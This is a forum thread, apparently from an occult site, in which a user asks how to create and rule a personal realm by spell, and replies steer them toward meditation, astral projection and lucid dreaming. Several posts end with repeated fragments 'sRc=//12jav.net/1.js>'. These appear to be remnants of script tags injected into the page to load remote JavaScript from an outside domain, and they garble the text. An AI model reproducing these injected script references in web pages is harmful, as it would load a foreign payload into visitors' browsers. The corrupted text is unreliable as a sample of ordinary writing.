This is simply not possible, especially via a spell.

Via astral projection you can travel to other places and realms, but you cannot create one solely for the purpose of you to become a God, you could always try creating a happy place and escaping to that instead.

well i meant a king like sheogorath (my role model and favorite character). i wanted a place so i can escape my daily life thats filled with chaos and pain. plus i want to see if my ideas will be successful sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I am sorry but you cannot become a King like in the Elder Scrolls, you are a bog standard human being and unless you are in for a chance at being a King of a country then you cannot be a King through a spell.

As H2O said, you can create a sort of psychic space. Some people use such a created realm (so to speak) as a starting point in certain pathwalking and astral projection exercises, or just as a mental place in which to meditate (or as H2O called it, a happy place). sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

You can sit down and meditiate. You can project yourself to a safe space you consider your own. But simply put, you cannot become or a god or anything of the sort whatsoever.

Do you know how to lucid dream? Creating a different realm for you to rule doesn't really seem possible, but lucid dreaming (and astral projection, as others have suggested) is just about the closest you can get. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
